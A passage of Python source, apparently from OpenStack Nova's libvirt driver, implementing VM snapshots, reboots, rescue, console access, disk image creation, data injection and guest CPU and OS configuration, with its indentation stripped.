state = LIBVIRT_POWER_STATE[state]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self.has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm":
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
# confims the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
snapshot_name,
image_type=source_format)
if live_snapshot:
LOG.info(_("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_("Beginning cold snapshot process"),
instance=instance)
snapshot_backend.snapshot_create()
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt_snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE (rmk): libvirt needs to be able to write to the
# temp directory, which is owned nova.
utils.execute('chmod', '777', tmpdir, run_as_root=True)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
if not live_snapshot:
snapshot_backend.snapshot_delete()
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
LOG.info(_("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
image_service.update(context,
image_href,
metadata,
image_file)
LOG.info(_("Snapshot image upload complete"),
instance=instance)
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
def _wait_for_block_job(domain, disk_path):
status = domain.blockJobInfo(disk_path, 0)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if cur == end and cur != 0 and end != 0:
return False
else:
return True
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while _wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2', None,
out_path, image_format)
def reboot(self, context, instance, network_info, reboot_type='SOFT',
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
if self._soft_reboot(instance):
LOG.info(_("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_("Failed to soft reboot instance."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slighty longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
for x in xrange(CONF.libvirt_wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
new_domid = dom.ID()
# NOTE(ivoks): By checking domain IDs, we make sure we are
# not recreating domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
If xml is set, it uses the passed in xml in place of the xml from the
existing domain.
"""
self._destroy(instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self.get_instance_disk_info(instance['name'], xml,
block_device_info)
self._create_images_and_backing(context, instance, disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
dom.managedSave(0)
def resume(self, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
if self.instance_exists(instance['name']):
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
power_state.PAUSED)
if state in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
should not edit or over-ride the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
rescue_images = {
'image_id': CONF.rescue_image_id or instance['image_ref'],
'kernel_id': CONF.rescue_kernel_id or instance['kernel_id'],
'ramdisk_id': CONF.rescue_ramdisk_id or instance['ramdisk_id'],
}
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
None,
image_meta,
rescue=True)
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self.to_xml(instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance['name'])
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self.get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self.to_xml(instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
LOG.debug(_("Instance is running"), instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
fp = open(fpath, 'a+')
fp.write(data)
return fpath
def get_console_output(self, instance):
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes '
'ignored'), remaining, instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
port = get_vnc_port_for_instance(instance['name'])
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
@exception.wrap_exception()
def get_spice_console(self, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
return (None, None)
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
os.close(f)
LOG.debug(_("Path '%(path)s' supports direct I/O") %
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug(_("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'") %
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
if not fs_format:
fs_format = CONF.default_ephemeral_format
if not CONF.libvirt_images_type == "lvm":
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
if fs_format:
utils.mkfs(fs_format, target, label)
def _create_ephemeral(self, target, ephemeral_size, fs_label, os_type):
self._create_local(target, ephemeral_size)
disk.mkfs(os_type, fs_label, target)
@staticmethod
def _create_swap(target, swap_mb):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None, admin_pass=None):
if not suffix:
suffix = ''
booted_from_volume = (
(not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping
)
# syntactic nicety
def basepath(fname='', suffix=suffix):
return os.path.join(libvirt_utils.get_instance_path(instance),
fname + suffix)
def image(fname, image_type=CONF.libvirt_images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(basepath(suffix=''))
LOG.info(_('Creating image'), instance=instance)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
# NOTE(vish): No need add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * 1024 * 1024 * 1024
if size == 0 or suffix == '.rescue':
size = None
image('disk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = instance['os_type']
if not os_type_with_default:
os_type_with_default = 'default'
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"])
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * 1024 * 1024 * 1024
image('disk.local').cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for eph in driver.block_device_info_get_ephemerals(block_device_info):
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % eph['num'],
os_type=instance["os_type"])
size = eph['size'] * 1024 * 1024 * 1024
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
image(blockinfo.get_eph_disk(eph)).cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'])
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * 1024 * 1024
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = basepath(fname='disk.config')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection
elif CONF.libvirt_inject_partition != -2:
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt_inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt_type == 'lxc':
target_partition = None
if CONF.libvirt_inject_key and instance['key_data']:
key = str(instance['key_data'])
else:
key = None
net = netutils.get_injected_network_template(network_info)
metadata = instance.get('metadata')
if not CONF.libvirt_inject_password:
admin_pass = None
if any((key, net, metadata, admin_pass, files)):
# If we're not using config_drive, inject into root fs
injection_path = image('disk').path
img_id = instance['image_ref']
for inj, val in [('key', key),
('net', net),
('metadata', metadata),
('admin_pass', admin_pass),
('files', files)]:
if val:
LOG.info(_('Injecting %(inj)s into image '
'%(img_id)s'),
{'inj': inj, 'img_id': img_id},
instance=instance)
try:
disk.inject_data(injection_path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
if CONF.libvirt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
return self._caps
def get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self.get_host_capabilities()
return caps.host.uuid
def get_host_cpu_for_guest(self):
"""Returns an instance of config.LibvirtConfigGuestCPU
representing the host's CPU model & topology with
policy for configuring a guest to match
"""
caps = self.get_host_capabilities()
hostcpu = caps.host.cpu
guestcpu = vconfig.LibvirtConfigGuestCPU()
guestcpu.model = hostcpu.model
guestcpu.vendor = hostcpu.vendor
guestcpu.arch = hostcpu.arch
guestcpu.match = "exact"
for hostfeat in hostcpu.features:
guestfeat = vconfig.LibvirtConfigGuestCPUFeature(hostfeat.name)
guestfeat.policy = "require"
guestcpu.features.append(guestfeat)
return guestcpu
def get_guest_cpu_config(self):
mode = CONF.libvirt_cpu_mode
model = CONF.libvirt_cpu_model
if mode is None:
if CONF.libvirt_type == "kvm" or CONF.libvirt_type == "qemu":
mode = "host-model"
else:
mode = "none"
if mode == "none":
return None
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug(_("CPU mode '%(mode)s' model '%(model)s' was chosen")
% {'mode': mode, 'model': (model or "")})
# TODO(berrange): in the future, when MIN_LIBVIRT_VERSION is
# updated to be at least this new, we can kill off the elif
# blocks here
if self.has_min_version(MIN_LIBVIRT_HOST_CPU_VERSION):
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
elif mode == "custom":
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.model = model
elif mode == "host-model":
cpu = self.get_host_cpu_for_guest()
elif mode == "host-passthrough":
msg = _("Passthrough of the host CPU was requested but "
"this libvirt version does not support this feature")
raise exception.NovaException(msg)
return cpu
def get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self.get_hypervisor_version())
def get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self.get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self.get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_ephemeral_device':
'/dev/' + disklocal.target_dev})
for eph in driver.block_device_info_get_ephemerals(
block_device_info):
diskeph = self.get_guest_disk_config(
instance,
blockinfo.get_eph_disk(eph),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self.get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_swap_device': '/dev/' + diskswap.target_dev})
for vol in block_device_mapping:
connection_info = vol['connection_info']
info = disk_mapping[vol['mount_device']]
cfg = self.volume_driver_method('connect_volume',
connection_info,
info)
devices.append(cfg)
if 'disk.config' in disk_mapping:
diskconfig = self.get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self.set_cache_mode(d)
return devices
def get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self.get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
guest.memory = inst_type['memory_mb'] * 1024
guest.vcpus = inst_type['vcpus']
guest.cpuset = CONF.vcpu_pin_set
quota_items = ['cpu_shares', 'cpu_period', 'cpu_quota']
for key, value in inst_type['extra_specs'].iteritems():
scope = key.split(':')
if len(scope) > 1 and scope[0] == 'quota':
if scope[1] in quota_items:
setattr(guest, scope[1], value)
guest.cpu = self.get_guest_cpu_config()
if 'root' in disk_mapping and disk_mapping['root']['dev'] is not None:
root_device_name = "/dev/" + disk_mapping['root']['dev']
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': root_device_name})
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.xen_hvmloader_path
if CONF.libvirt_type in ("kvm", "qemu"):
caps = self.get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self.get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.XEN:
guest.os_root = root_device_name
else:
guest.os_type = vm_mode.HVM
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
else:
guest.os_boot_dev = "hd"
if CONF.libvirt_type != "lxc" and CONF.libvirt_type != "uml":
guest.acpi = True
guest.apic = True
clk = vconfig.LibvirtConfigGuestClock()
clk.offset = "utc"
guest.set_clock(clk)
if CONF.libvirt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
